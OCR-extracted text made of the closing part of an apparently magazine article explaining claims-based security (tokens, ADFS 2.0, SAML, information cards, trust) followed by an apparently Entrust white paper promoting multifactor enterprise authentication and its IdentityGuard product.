if this step is taken, the next one could be giv- 
ing specific rights to carry out tasks. 



www.insecuremag.com 



64 



Identity management challenges associated 
with cross-company, cross-domain issues, 
has given rise to an approach known as fed- 
erated identity management or identity fed- 
eration. There are a couple of important as- 
pects here. Federation is about the different 
pieces of information about users (or princi- 
pal) stored in different places (different iden- 
tity management systems or identity silos) 
and bringing all of this information together. 
This data is joined by use of a token. Identity 
federation is also about authenticating a user 
across multiple sites within a company or 




even across independent and separated se- 
curity realms. 

Research concerning this subject is going on 
for years now. How to solve the problem of a 
widely adopted standard and global trusted 
identity solution that will fit in the new online 
world of the Internet? There are lots of rea- 
sons for looking for better alternatives. In all 
the cases presented, claims-based security 
seems to hold the promise of solving those 
problems. 



Token with claims 



Claims-based security 

Claims-based authentication works in a 
slightly different manner. Application owners 
are provided with authentication services that 
are platform and application independent, so 
that no silos or separate identity stores within 
organizations are needed. The authentication 
part is separated from the actual applications. 

Here is an example. Frank (the end-user or 
subject) wants to access an Internet book- 
store and maybe order a book. To prove his 
identity, he first contacts an issuer and asks 
for a security token. 

After verification, the provider (issuer) of the 
requested digital identity creates and returns 



a signed token. A token is nothing more than 
a signed statement by an issuer about a sub- 
ject (in this case Frank). If this sounds familiar 
it is because this basic concept applies also 
to the Public Key Infrastructure or PKI. 

The token includes one or more claims. They 
can contain very specific or more generic 
pieces of information about the subject - like 
an address, birth date, gender, and so on. Af- 
ter completion, Frank contacts the online 
bookstore and presents the token and claims 
he got it from the issuer. The bookstore trusts 
the issuer of the signed token. After checking 
if the issuer is legitimate, the bookstore ac- 
cepts the information. Frank now gains ac- 
cess and can search online and order the 
book he had in mind. 
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• 

• Tokens contain claims and a claim represents 

• a specific attribute about a subject or identity. 

• Claims-based security is about authentication 
I and authorization based on those validated 

• attributes. 

• 
• 

• Policies within the application itself demand 
. the attributes needed (the specific claims 

• asked for) and finally permissions are granted 

• based on those claims to execute a certain 

• function within the application. 



In this case, the software developer is not re- * 
quired to know the identity of the user or to 
have a system and process in place for identi- * 
fying the user. That is because the whole 
process and the validation are now done by a [ 
trusted party. A validated identity by that 
trusted party is associated with a set of 
claims, or claim set. If the owner of the appli- 
cation or service trusts the claim-based 
authentication mechanism and the issuer, we * 
can trust the claims enclosed. 




< 

Access granted and 

based on claims specific 
functionality or rights 



Claims-based process 



The traditional way of authenticating had a 
more or less strict set of attributes. Claims- 
based security makes it possible to add spe- 
cific information by adding and demanding 
specific attributes or claims that can be used 
within the application. This is good, because 
with traditional authentication the application- 
specific information resides more often than 
not with the application itself, stored in a da- 
tabase or directory. It is also a good thing that 
claims-based security is based on vendor- 
neutral, standardized building blocks such as 
SAML, WS-Security, and WS-Trust. 



Microsoft Geneva framework 

Microsoft has created a framework called Ge- 
neva, which provided the components to im- 
plement claims-based security. After a time, 
Geneva has been renamed and it contains 
parts essential for the implementation of 
claims-based security: the Windows Identity 
Foundation (WIF) - a set of .NET Framework 
classes for implementing claims-based secu- 
rity within applications, "Geneva" Server Se- 
curity Token Service (STS) - which has been 
renamed into Active Directory Federation 
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Services 2.0 - issues and transforms claims, 
enables federations, and manages user ac- 
cess. And, finally, the Windows Card Space 
2.0, which helps developers build authentica- 
tion solutions. Card Space provides a user 
interface for selecting identities. Each identity 
is thereby represented as a card. 

ADFS or STS 

ADFS 2.0 is the next step to the original Ac- 
tive Directory Federation Services technology. 
It supports identity federation and provides 
broad support for claims-based identity. With 
ADFS, we can implement a token service or 
STS that generates SAML tokens. The tokens 
are signed and any service that trusts the to- 
kens created by that STS is willing to accept 
the claims that are incorporated. Microsoft 
ADFS allows an authorized front-end Web 
application to impersonate its users to other 
services like an application server. In addition, 
ADFS does not require that a traditional user 
account exists in Active Directory for the im- 
personated user. Also, for claims-based secu- 
rity to work, you don't need to use Microsoft 



ADFS 2.0. An STS from any other vendor can 
be used instead. 

Microsoft worked with the WS specifications. 
These specifications define methods for issu- 
ing, renewing, and validating security tokens 
and ways to establish trust relationships. WS- 
Trust defines a number of elements such as 
the concept of a Security Token Service 
(STS), and the formats of the messages used 
to request security tokens and the responses 
to those messages. Industry-standard, in- 
teroperable protocols such as WS-Federation, 
WS-Trust and other WS-* security standards 
are supported out of the box. Unlike the first 
ADFS release, which supported only Web 
browsers, ADFS 2.0 supports both browsers 
and other clients (active and passive), such 
as those built using Windows Communication 
Foundation (WCF). ADFS (STS) supports 
also multiple authentication methods. Users 
will be able to authenticate with a user name 
and password combination, the Kerberos 
authentication protocol, client X.509 certifi- 
cates, or Information Cards. 
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• Making it work 

• 

• With claims-based authentication, it is not 
necessary to have just one Secure Token 

• Service or STS. In practice, this would imply 
. that all the applications and all the services 

• must rely on a single STS. Of course, we 

• could implement fault tolerant services or an 

• STS farm, but all claims (different attributes) 

• demanded by different services are part of a 
I single token. This, you must agree, is not a 

• smart idea. So, it is possible to split function- 
I ality and have specific claims and attributes 

• stored in different tokens. 

• 
• 

• It is like a shopping list. The list we use in a 

• supermarket cannot be used in a bookshop. 

• Both lists are "shopping lists" (tokens), but 

• contain different items (specific claims). 



Information cards 

The token is a technical term not suitable for 
ordinary users. A token with claims can be 
called an information card, info card or iCard. 
By using info cards, users can authenticate 
themselves without needing to type in all the 
specific details concerning their identity for 
every application or web site, and the info 
cards can be used on multiple sites. One can 
consider it a digital credit card. 

Trusted providers of digital identities issue 
info cards for you. Bookstores, government, 
insurance companies, and credit card com- 
panies might provide identities enabling on- 
line payment services. They are all able to 
issue identities to their customers and the us- 
ers can use this info card for online services. 



EQUIFAX 



Equifaxicards.com 
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Creating Info cards 



There are different types of info cards. The 
personal (also called self-issued) information 
cards allow you to issue tokens and claims 
about yourself to sites willing to accept them. 
These claims can include your name, ad- 
dress, email address. This is a low-end solu- 
tion, because the trust level is low. There are 
also managed info cards that allow identity 
providers other than yourself to make claims 
about you. These claims can include any in- 
formation that a relying party requests. 

SAML 

The info cards come as XML files (SAML) that 
can be offered to you by card-issuing web- 
sites, and can be used with card selectors. 
Security Assertion Markup Language (SAML) 



is an XML-based standard for exchanging 
authentication and authorization data. It is de- 
veloped by the OASIS Security Services 
Technical Committee. 

SAML is the standard for claims and allows 
attributes (or claims) to be expressed. A gen- 
eral policy can be enforced in the security 
system of a service provider (the website de- 
manding specific attributes or claims). The 
existing policies must be enforced in the ap- 
plication code itself. 

Identity selector 

If you contact an info card capable application 
or website, the identity selector comes into 
play to let you decide which identity to use. 
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The client application or web browser invokes 
the Info Card identity selector. Next, the se- 
lector can display the possible cards that 
might comply with the enforced policy and 
present these cards to the user. In the 
%WINDIR%\system32 directory there is a file 
called infocardapi.dll. This DLL incorporates a 
function called GetToken. The result is that 
when the function is called, a pop-up will ap- 
pear and the identity selector lets the user 
choose one of the available info cards. By 



choosing that particular info card, the user se- 
lects a security token to use with the specific 
service requested. 

The whole purpose of it all is that online serv- 
ice providers like bookstores, insurance com- 
panies, banks, and any kind of other online 
service that need a digital identity will be us- 
ing the same infrastructure. Sites that are ca- 
pable using your info card will use a special 
symbol to inform you about this fact. 




Information Card symbol 



Implementation scenarios 

There are different scenarios possible for im- 
plementing a claims-based infrastructure. It 
can be a very localized implementation, within 
an organization, but also in a federated sce- 
nario. In a federated scenario, the trust be- 



tween two or more organizations is needed 
and this can be achieved by trusting each 
STS involved. However, the most interesting 
scenario is where a third party that provides 
the level of trust and the corresponding to- 
kens with appropriate claims demanded by 
your organization's policy is involved. 



Token provider 
or STS company A 



Token provider 
or STS company A 
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User want to 
access services 



Services using 
claims-based 
security and STS 



Trust between organizations 
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Trust 

In this last scenario, "trust" will be the key as- 
pect. Trust must be addressed if we want 
claims-based security to work in our digital, 
decentralized world. Trust relationships be- 
tween two or more organizations is the easi- 
est variant, because we can verify procedures 
with the trusted partner or even have service 
level agreements about this. 

When we don't know the user directly, a third 
party must be involved to accompany the 
level of trust needed to get business done. 

Software vendors or big players in the IT 
world can provide excellent technical solu- 
tions but can they provide the level of trust 
needed? The answer is "no". Would you 
automatically trust users if they have a digi- 
tally signed info card received from the STS 
of company called "HaveALittleFaith.com"? 



A user can establish a level of trust by simply 
doing business on the Internet. A good exam- 
ple of this is the rating system on eBay. A 
good seller or buyer will get a good recom- 
mendation from people he has done business 
with and who were satisfied with it. By collect- 
ing more and more good references, the level 
of trust rises. Even if you don't know that per- 
son at all, one glimpse at the rating reveals 
the level of trust. 

In the claims-based world, this phenomenon 
could be used and represented in a specific 
claim about that user. However, certain serv- 
ices out there need a higher level of trust. 
Banking services are an example of this. 

A preferable scenario would be to get an info 
card from an independent and highly trusted 
party. Government is an option, and even 
banks or financial institutes could do it. 



Independent trusted party 
providing token services or STS 




Claims-based process with 3rd party involved 
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Progression 

To solve the issues mentioned earlier, there 
are some interesting things being done. The 
initiative and research from Novay 
(www.novay.nl) is one of those. Novay is 
working on ePassports by using the chips 
embedded in passports for online authentica- 
tion. For a couple of years now, passports 
have had an embedded chip (RFID) with in- 
formation like name and birth date stored in it. 

This chip is primarily used to facilitate identifi- 
cation and authentication when it comes to 
border control, but can also be used for online 
authentication. Novay converts the passport 
data in an info card. While there are some 
very sensitive attributes like your Social Secu- 
rity number, there is always the possibility to 
use a filter to extract only the relevant data 
and protect the sensitive part. 

The concept is very interesting because 
passports are issued through a controlled 
process executed by the government. We 
could use the passport to authenticate not 
only in the physical world but also in a situa- 
tion where you find yourself online and you 
want to use your trusted identity in the digital 
world. 

While your passport is used on behalf of the 
government, in this way it also can be used 
for commercial services, since the issuing 
party is trusted by lots of organizations - both 
in the profit and non-profit sector. To give an 
example of a similar case concerning trust: a 
lot of organizations out there perform a so- 
called pre-employment screening. A Human 
Resource (HR) department checks the person 
and the CV. Part of the screening process in- 
cludes the passport being used to check the 
identity. Everybody knows and accepts this, 
and the process works just fine. 



Conclusion 

This article discussed claims-based security, 
and the idea behind it. I've introduced some 
concepts that may sound new such as to- 
kens, claims, federated identity, and info 
cards, but in reality are not. In fact, many of 
the ideas presented here have been floating 
around for years now. WS-Federation, SAML, 
and other federated identity protocols have 
been present for a long time now. 

This trust model is supported by a rising 
number of vendors, and the discussion about 
its implementation is still going strong. The 
idea has merit, but the issue of trust must be 
addressed. There are a lot of initiatives trying 
to solve this problem. 

Right now we can establish trust between or- 
ganizations to make claims-based security 
work. The STS infrastructure from company A 
can trust the STS from company B as de- 
scribed in this article. We could also use 
claims-based security with applications within 
our own company. However, this is all just an 
improvement within our organization - we can 
put specific claims or attributes in a token that 
we can then use with our applications. This 
makes it easier for application developers to 
solve some traditional problems and ques- 
tions concerning multi-platform authentication. 

The final step is to solve the problem of creat- 
ing a widely accepted and trusted digital iden- 
tity platform that will work globally and can 
also be used to solve important questions 
when it comes to working with digital identities 
on the Internet and the concept of federation. 

Claims-based security could really make a 
difference and will help us support online 
services working with identities. All that re- 
mains now is to make that final step forward 
towards a wide acceptance of this concept. 
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1 Introduction 



Passwords alone don't provide enough protection 

Enterprise authentication used to be simple: passwords for everyone, expensive tokens for a 
small number who work remotely. But the world is changing. The workforce is now mobile, with 
large numbers of employees accessing the corporate network from hotels, coffee shops and their 
homes, putting confidential data at risk. New security practices and policies are being rolled out 
for regulatory compliance, and they all highlight the need for strong authentication. 

Experts agree that username/password authentication does not provide enough protection 
against unauthorized access. ClOs are challenged to increase authentication security while 
preserving operational and budget efficiency. 

Challenge No. 1: Efficiently roll out strong enterprise versatile authentication to a growing 
number of users while controlling costs. 

Beyond the single authenticator 

When a limited community of users with the same basic requirements needed additional 
protection, a single authenticator such as tokens, though traditionally expensive and sometimes 
hard to manage, was a reasonable solution. That small community of users who need more than 
password protection has ballooned. 

The authentication requirements of users within an organization now may vary depending on a 
number of factors, including the level of security required, their usability needs and experience, 
and where and how they are remotely accessing the network. Often a component of layered 
security model, a versatile authentication platform with a range of authentication options, which 
can be matched to user constituency based on policy and risk assessment now and as 
organizational requirements change, is an important requirement. 

Challenge No. 2: Meet potentially diverse company authentication requirements now and in to the 
future with a single versatile authentication platform. 



Simple passwords alone no longer provide sufficient 
confidence in users' asserted identities. 

Ant Allan, Gartner Research 
Gartner IT Security Summit 2006 Presentation 
"User Authentication Solved!" 

June 2006 
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2 Balancing Act: 

Regulatory Requirements, Remote Workers & Reducing Costs 

The boundaries of the corporate network are being challenged as more employees need access 
wherever they are. Extranets, intranets, Web mail and now, more than ever, desktops need 
strong authentication as they are being accessed from beyond the boundaries of the corporate 
network. 

This increasing pressure to make more information available to employees anywhere, at anytime, 
must be balanced with increasing pressure for corporate and regulatory compliance. From the 
PCI-DSS (Payment Card Industry Data Security Standard) to SOX (Sarbanes-Oxley Public 
Company Accounting and Investor Protection Act) and HIPAA (Health Insurance Portability and 
Accountability Act), most organization are rolling out new practices to achieve regulatory 
compliance. 

Simple passwords, even for users operating exclusively internally, are no longer enough to 
prevent breaches, protect privacy and achieve compliance. Strong authentication must be 
deployed to a wider audience — efficiently and cost-effectively. 

Looking at enterprise authentication as a whole, the flexibility to secure different users and their 
connectivity using different and appropriate authentication methods is critical. Using risk 
assessment and policy to determine when stronger security is required for access to resources 
with greater value allows authentication to be layered as needed. 

One single-authentication platform used across VPN remote access, Microsoft desktop and Web 
implementations can provide a suitable, cost-effective and easier way to manage enterprise 
authentication. 



3 Regulatory Review 
HIPAA 

The Health Insurance Portability and Accountability Act (HIPAA), passed by Congress in 1996, 
seeks to protect the privacy and the security of health information. The HIPAA Security Standard 
covers the safeguards that should be implemented to protect electronic patient information. 
Organizations must ensure that private health information is protected both at rest and in transit. 
Multifactor authentication can play an important role in protecting health information by restricting 
who has access to that information. 

"Implement procedures to verify that a person or entity seeking access to electronic protected 
health information is the one claimed. " 

— HIPAA Security Rule 
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PCI 

In response to member, merchant and service provider feedback on the need for a single 
approach to stronger information security for all card brands, credit card companies collaborated 
in creating common industry security requirements known as the Payment Card Industry (PCI) 
Data Security Standard. Compliance with the PCI Data Security Standard is a requirement for all 
merchants or service providers that store, process or transmit cardholder data. 



Requirement 7: Restrict access to data by business need-to-know. This addresses the fact that 
critical data should only be accessed in an authorized manner. 

Requirement 8: Assign a unique ID to each person with computer access. This provides 
verification that actions taken on critical data and systems are performed by, and can be traced 
to, known and authorized users. 

— PCI Data Security Standard 



Many organizations use simple usernames and passwords to restrict access to sensitive data and 
to validate to authenticity of the user. The PCI standard demands more. 

Password-based authentication or single-factor authentication to critical enterprise resources can 
leave networks and data exposed to unnecessary risk and compromise compliance to PCI 
requirements. Multifactor authentication provides additional security to help verify that only 
authorized individuals access this information. 



SOX 

The Public Company Accounting Reform and Investor Protection Act — known as the Sarbanes- 
Oxley Act (SOX) — is legislation intended to help reform accounting practices, financial 
disclosures and corporate governance of public companies. The SOX guidance suggests that 
organizations need to focus on reviewing the accuracy of financial information and the reliability 
of systems that generate it. 

Under the SOX guidelines, companies must demonstrate system and application integrity for 
tools used to generate financial reports. Verifying and restricting access to financial systems is a 
critical component of providing strong IT security for financial data. 



The European Union's Data Protection Directive 

The EU Data Protection directive (DPD) has two main purposes: to protect personal privacy and 
to standardize privacy regulations across member nations. Unlike many North American laws, the 
EU DPD is very specific in its requirements of the transfer of personal information to countries 
deemed not to have strong enough data protection policies, including the United States. 

American organizations must apply for safe harbor and comply with strict requirements that 
demonstrate they have the policies and practices in place to protect personal data. These 
requirements include stringent security practices to protect against loss, destruction, unauthorized 
access or misuse of personal information. 
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4 The Facts on Factors and Authentication Methods 

Authentication factors are independent ways to establish identity and privileges. They play a key 
role in helping to determine that you are who you say you are. Authentication methods can 
involve up to three factors: 

• Knowledge: something the user knows (password, PIN) 

• Possession: something the user has (ATM card, smart card) 

• Attribute: something the user is (biometric, fingerprint, retinal scan) 

Adding factors of authentication adds security and can help limit vulnerability to identity attacks. 
Properly designed and implemented multifactor authentication methods can offer stronger breach 
prevention with minimal user impact. 

Traditionally, organizations have relied on simple username and passwords, combined with 
business processes, to manage risk. Risks have significantly increased as larger mobile 
workforces access the corporate network from remote locations and identity attacks have become 
more common. 

Now, breaches occur more often, brands are impacted by fraud incidents and important 
regulations have been implemented to help protect users and information. These issues have 
made the necessity of multifactor authentication increasingly apparent. 



5 Demystifying the Top Authentication Methods 

The wide variety of authentication options available today can help increase security for specific 
activities and user communities. A number have proven themselves to be very effective for 
enterprise authentication, including: 

• Physical tokens (OTP hardware, display cards) 

• Security grids 

• Soft tokens, including public key infrastructure (PKI) 

• Smart cards 

• Biometrics 

There are also several new methods that are playing an increasing role in enterprise 
authentication: 

• Machine authentication 

• Knowledge-based authentication 

• Out-of-Band authentication 

• IP-Geolocation 

These authentication methods, which have broad acceptance in the enterprise market, are 
detailed on the next page. 
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Physical tokens 

One of the first second-factor authentication options, tokens deliver strong authentication via a 
variety of form factors, including random-number one-time-password (OTP) tokens, USB tokens 
and even credit card-sized tokens. 

Physical tokens traditionally have been relatively expensive to deploy, manage and maintain. 
New platform approaches to authentication have reduced the management complexity and 
significantly reduced the price of OTP tokens to the $5 range. Tokens can be used very 
effectively in combination with other authentication methods to provide company-wide coverage 
based on the risk profile of the users. 

Security grids 

Security grids can provide strong second-factor protection using a grid card issued to each user. 
Users are asked to enter characters from the grid at login. Inexpensive to produce and deploy, 
and easy to use and support, these highly intuitive cards have a very high success rate in the 
enterprise. 

Grid cards can be produced and distributed in a number of ways, including a credit card-like 
format in thin plastic, paper and even virtually for electronic storage. 

Soft tokens 

Digital identities, such as those powered by a PKI, can provide the benefits of second-factor 
authentication without deploying a physical token to end-users. Frequently used by organizations 
requiring higher levels of assurance, PKIs power the generation and distribution of keys and 
certificates that make up a digital identity. 

Robust systems provide key and certificate management services that not only enable 
authentication, but encryption and digital signature capabilities across applications in a way that is 
transparent and easy to use. 

Smart cards 

Smart cards have widespread acceptance in Europe and are gaining increased acceptance in 
other parts of the world. Because smart cards provide portable, two-factor protection for digital 
credentials, they are a versatile option for enterprises that are considering tokens for physical and 
logical access. 

Biometrics 

Biometrics measure and analyze human physical characteristics such as fingerprints, eye retinas 
and irises, and facial patterns to identify users. Because they can be expensive and difficult to 
manage, they are typically not very cost effective for most large-scale enterprise deployments. 

Machine authentication 

This non-invasive method of strengthening user authentication stores and validates a "fingerprint" 
of a registered machine. The fingerprint consists of a variety of elements gathered from the user's 
machine such as the operating system, screen resolution, browser type or even IP address. The 
stored machine fingerprint is compared with information gathered from the machine when a user 
attempts to log in. This method does not require any user interaction beyond initially registering 
the machine and can be very cost effective to deploy. 
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Knowledge-based authentication 

This intuitive method of authentication uses challenge questions and answers to provide strong 
authentication. This method enhances authentication without the need to deploy anything 
physical to the end user. 

Out-of-band authentication 

Out-of-band user authentication leverages an 
independent means to communicate with the user 
beyond the primary communication channel. Using a 
different medium such as a cell phone, PDA or 
home phone, an independent authentication 
challenge can be delivered to the user. 

Out-of-band user authentication can be a cost- 
effective, user-friendly option since existing devices 
that users have can be leveraged, eliminating the 
need for the deployment of new or additional 
devices. 

IP-Geolocation 

Authenticated users can register locations where they frequently access the corporate network. 
During subsequent authentications, the server compares their current location data, including 
country, region, city, ISP, latitude and longitude, to those previously registered. Organizations 
only need to "step up" authentication when the values don't match. 

Organizations can create blacklists of regions, countries or IPs based on fraud histories. They 
can even leverage an open fraud intelligence network to receive updated lists of known fraudulent 
IPs based on independent professional analysis. 




6 Selection Criteria for Enterprise Authentication 

With such a broad range of authentication methods available, selecting the appropriate solution 
can be daunting. When comparing authentication options, a solution that provides multifactor 
authentication methods from a single administration and management platform provides the most 
flexibility and allows organizations to match the appropriate authentication method with the user 
risk profile. 

Assess the following key criteria when evaluating an enterprise 
versatile authentication solution: 

Cost There are two critical components to total cost of ownership: purchase 

cost and operating cost. Be sure to thoroughly evaluate both the up-front 
purchase costs and the costs over the lifetime of the deployment, 
including: device replacement, management and renewal costs. Lower 
total cost allows the deployment of strong authentication to more users 
for the same amount of budget dollars extending the security coverage. 

Usability No matter what the authentication method or deployment plan, new 

authentication methods should not fundamentally change the way 
employees are accustomed to working. Choose a system that can follow 
existing user-interaction models and minimize the need for additional 
technology knowledge for employees. 
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Flexibility Invest in a platform with multiple authentication options that allow 

companies to match the authentication method to the risk profile of the 
user. 

Investing in systems that provide only certain authentication methods 
does not consider the inevitable need to make changes and 
enhancements to authentication over time. Choose a platform that 
addresses all needs now and can grow and change over time. 



Integration Authentication is one part of a strategic layered security model. Choose 

a platform that is integrated with key enterprise applications, including: 



• Leading IP-SEC and SSL VPN remote access vendors, such as 
Cisco, Check Point, Nortel and Juniper using the Radius standard 
to ensure rapid, consistent integration across remote-access 
products 

• Standard Microsoft Windows client 

• Web services and leading applications like Microsoft Outlook Web 
Access 



Security Leader Choose a company that is an established security leader with a trusted 

reputation and focused dedication to assist in determining the proper 
balance between security requirements, budget and usability for the 
company's unique situation. 



Selection Selecting the appropriate technology and vendor to provide a versatile 

authentication platform is always a difficult task. Ensuring that an 
organization selects the appropriate vendor for an enterprise will require 
an assessment of the vendor's solution to determine if it is able to 
addresses individual authentication requirements now and as 
requirements change in the future. 
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7 The Entrust Solution 

Entrust IdentityGuard is an open versatile authentication platform that is a common-sense 
approach to strong authentication, enabling companies to apply the right level of strong 
authentication tailored to the risk associated with the user or user transaction. 

Entrust IdentityGuard integrates into existing environments to provide a range of inexpensive 
authentication options that can be implemented as required without the need to deploy expensive 
hardware or force significant changes to the user experience. The range of authentication 
includes device authentication, security grids, knowledge-based, OTP tokens and display cards, 
out-of-band or mobile authentication along with mutual authentication to validate the Web site to 
the user. 




Figure 1: Entrust IdentityGuard Enterprise Architecture 



Entrust IdentityGuard provides multifactor authentication for applications, including: 

• Remote access (secure IPSEC and SSL VPN provided from leading vendors, including 
Cisco, Check Point, Citrix, Nortel, Juniper and Avaintail) 

• Native Microsoft desktop application integration 

• Leading Web applications like Microsoft Outlook Web Access 

Each authentication option is easy to use with minimal impact to the end-user experience. 
Organizations can choose how they want their users to authenticate depending on user type and 
the application being used. 



Entrust IdentityGuard helps to: 

• Manage cost and complexity with a single versatile authentication platform that provides 
a range of strong authentication methods as part of a layered security approach. 

• Streamline administration with central policy management that can help decrease the risk 
of policy inconsistency. 

• Be ready for what comes next thanks to a standard-based architecture and open platform 
committed to adding new and innovative authentication options. 
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8 Conclusion 

As the pressure to comply with regulatory requirements combines with the growing number of 
users working outside the boundaries of the corporation, the need for strong authentication for 
large portions of an employee community has never been greater. Organizations need stronger 
forms of authentication that are easy to use and less costly to purchase, deploy and maintain 
than traditional "one-size-fits-all" options. 

Entrust IdentityGuard addresses this need by providing an open versatile authentication platform, 
enabling organizations to increase security and help prevent the risk of potential breaches and 
attacks. As component of a layered security model, the solution can also provide organizations 
with strong authentication capabilities that can be deployed to a wider audience, with greater 
control and flexibility in determining how to secure different users and transactions. 



9 Industry Experts Agree 

"IDC believes that Entrust IdentityGuard offers enterprises easy-to-use and cost-effective strong 
authentication for employees, partners and customers accessing sensitive information from 
remote locations. " 

— IDC Research, "Entrust Offers Strong Authentication for Remote-Access Applications" 

June 2005 

• Winner of "Best Buy" award for top authentication platform (five-star rating), 
SC Magazine, July 2007 

• Winner of "Best Security Solution" in the 21st Annual SNA CODiE Awards, May 2006 

• Winner of "Excellence in Security Solution for Credit Unions," Information Security 
Products Guide, June 2006 



10 About Entrust 

Entrust provides trusted solutions that secure digital identities and information for enterprises and 
governments in 2,000 organizations spanning 60 countries. Offering trusted security for less, 
Entrust solutions represent the right balance between affordability, expertise and service. These 
include SSL, strong authentication, fraud detection, digital certificates and PKI. For information, 
call 888-690-2424, e-mail entrust@entrust.com or visitwww.entrust.com. 
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